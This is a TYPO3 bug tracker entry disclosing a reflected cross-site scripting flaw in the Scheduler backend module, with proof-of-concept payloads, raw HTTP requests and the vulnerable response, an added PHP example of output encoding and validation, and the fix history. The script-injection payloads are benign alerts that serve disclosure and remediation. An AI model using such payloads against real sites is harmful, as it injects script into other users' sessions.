Bug #82079

XSS in scheduler

Added by Oliver Hader about 2 years ago. Updated 12 months ago.

Status: Closed
Priority: Should have
Assignee: -
Category: -
Target version: -
Start date: 2017-08-10
Due date:
% Done: 100%
TYPO3 Version: 6.2
PHP Version:
Tags:
Complexity:
Is Regression:
Sprint Focus:

Description

I would like to inform you about a security issue that I have found in the plugin SCHEDULER of the CMS TYPO3 (checked on version 8.7.3); specifically, it is accessible in the "Scheduler" section of the Backend administrative console.

The plugin Scheduler of TYPO3 has turned out to be vulnerable to Reflected Cross-Site Scripting, for the requests to Add or Edit a task, specifically on the 2 parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D".

Technical Details
=================
The scenario to reproduce the security issue is described below.

Proof of Concept:
To replicate the issue, an authenticated user (with permission to create/edit tasks) has to click the button "Add-Task" or "Edit-Task" in the Scheduler area.
It is then sufficient to grab the request which is being passed to the server and add the payloads in the 2 vulnerable parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D", so that the submitted payloads are replicated in the response.

EXAMPLE
Payloads:
krup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1
de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag

ORIGINAL REQUEST:
----------------------------------
POST /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 479
Referer: http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add
Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=1500887453&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save

PoC REQUEST:
-----------------------
GET /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add&tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=15008874533rup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add
Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

PoC RESPONSE:
--------------------------
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2017 09:35:42 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: 0
Last-Modified: Mon, 24 Jul 2017 09:35:42 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51666

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
[...]
<label>Task group</label></abbr></span><div class="form-control-wrap"><select name="tx_scheduler[task_group]" id="task_class" class="form-control"><option value="0" title=""></option></select></div></div></div>
<div class="form-section"><div class="row"><div class="form-group col-sm-6" id="task_start_col"><label><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_start"><abbr class="t3-help-teaser">Start (HH:MM DD-MM-YYYY)</abbr></span></label><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_start_row-wrapper"><input name="tx_scheduler[start]_hr" value="20:48 11-08-2445" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_start_row"><input name="tx_scheduler[start]" value="15008874533rup3z"><script>alert(1)</script>yflbjwmu6m1" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_start_row"><span class="fa fa-calendar"></span></label></span></div></div></div>
<div class="form-group col-sm-6" id="task_end_col"><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_end"><abbr class="t3-help-teaser"><label>End (HH:MM DD-MM-YYYY)</label></abbr></span><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_end_row-wrapper"><input name="tx_scheduler[end]_hr" value="" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_end_row"><input name="tx_scheduler[end]" value="de6gi"><script>alert(2)</script>h3wq9ysmjag" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_end_row"><span class="fa fa-calendar"></span></label></span></div></div></div></div></div>
[...]

Attached is a screenshot of the PoC to better illustrate the vulnerability.

Vulnerable Versions:
TYPO3 8.7.3 and earlier

Checked on TYPO3/8.7.3

I have not received your response to the other 2 previous reports (I hope to receive at least a response from you). Anyway, I am always available if you need further explanations. Kind regards.
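
The reflection visible in the PoC response, as an added example that is not part of the original report and is not TYPO3's code: hypothetical helper functions render the hidden `tx_scheduler[end]` field once by plain concatenation, once with output encoding, and once after validating the value as a Unix timestamp. The function names are assumptions made for illustration; the input value is the one from the PoC request.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration only; these are not TYPO3 functions.

/** Vulnerable pattern: the request value is concatenated into the attribute as-is. */
function renderHiddenUnsafe(string $name, string $value): string
{
    return '<input name="' . $name . '" value="' . $value . '" type="hidden">';
}

/** Output encoding: quotes and angle brackets can no longer terminate the attribute. */
function renderHiddenEncoded(string $name, string $value): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    return '<input name="' . htmlspecialchars($name, $flags, 'UTF-8')
        . '" value="' . htmlspecialchars($value, $flags, 'UTF-8')
        . '" type="hidden">';
}

/** Input validation: start and end carry Unix timestamps, so accept digits only. */
function timestampOrEmpty(string $raw): string
{
    return ctype_digit($raw) ? $raw : '';
}

// Value of tx_scheduler[end] as sent in the PoC request, URL-decoded.
$end = rawurldecode('de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag');

// Unsafe: the double quote in the value closes the attribute and the rest is parsed as markup.
echo renderHiddenUnsafe('tx_scheduler[end]', $end), PHP_EOL;

// Encoded: the same value stays inside the attribute as inert text.
echo renderHiddenEncoded('tx_scheduler[end]', $end), PHP_EOL;

// Validated and encoded: the non-numeric value is dropped before rendering.
echo renderHiddenEncoded('tx_scheduler[end]', timestampOrEmpty($end)), PHP_EOL;

// The timestamp from the original request passes validation unchanged.
echo renderHiddenEncoded('tx_scheduler[start]', timestampOrEmpty('1500887453')), PHP_EOL;
```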

Associated revisions

Revision bb60d697 (diff)
Added by Wouter Wolters about 2 years ago

[BUGFIX] Prevent XSS in scheduler extension

Releases: master,8.7,7.6
Resolves: #82079
Change-Id: I21a6ebcff4ebd0c6f2d2c83e0aa6d9e2c03d32d9
Reviewed-on: https://review.typo3.org/53720
Tested-by: TYPO3com <>
Reviewed-by: Wolfgang Klinger <>
Reviewed-by: Andreas Fernandez <>
Tested-by: Andreas Fernandez <>
Reviewed-by: Frank Naegler <>
Tested-by: Frank Naegler <>

Revision bed4ceb6 (diff)
Added by Wouter Wolters about 2 years ago

[BUGFIX] Prevent XSS in scheduler extension

Releases: master,8.7,7.6
Resolves: #82079
Change-Id: I21a6ebcff4ebd0c6f2d2c83e0aa6d9e2c03d32d9
Reviewed-on: https://review.typo3.org/53737
Reviewed-by: Frank Naegler <>
Tested-by: Frank Naegler <>
Tested-by: TYPO3com <>

Revision e8ec374c (diff)
Added by Wouter Wolters about 2 years ago

[BUGFIX] Prevent XSS in scheduler extension

Releases: master,8.7,7.6
Resolves: #82079
Change-Id: I21a6ebcff4ebd0c6f2d2c83e0aa6d9e2c03d32d9
Reviewed-on: https://review.typo3.org/53736
Reviewed-by: Frank Naegler <>
Tested-by: Frank Naegler <>
Tested-by: TYPO3com <>

History

#1 Updated by Gerrit Code Review about 2 years ago

  • Status changed from New to Under Review

Patch set 1 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at https://review.typo3.org/53699

#2 Updated by Helmut Hummel about 2 years ago

Since Scheduler is an admin only module, we can publicly fix this issue.

#3 Updated by Helmut Hummel about 2 years ago

  • Project changed from Core Security to TYPO3 Core
  • Category deleted (OW-A07: Cross Site Scripting)

#4 Updated by Gerrit Code Review about 2 years ago

Patch set 1 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53720

#5 Updated by Gerrit Code Review about 2 years ago

Patch set 1 for branch TYPO3_8-7 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53736

#6 Updated by Gerrit Code Review about 2 years ago

Patch set 2 for branch TYPO3_8-7 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53736

#7 Updated by Gerrit Code Review about 2 years ago

Patch set 1 for branch TYPO3_7-6 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53737

#8 Updated by Wouter Wolters about 2 years ago

  • Status changed from Under Review to Resolved
  • % Done changed from 0 to 100

#9 Updated by Benni Mack 12 months ago

  • Status changed from Resolved to Closed
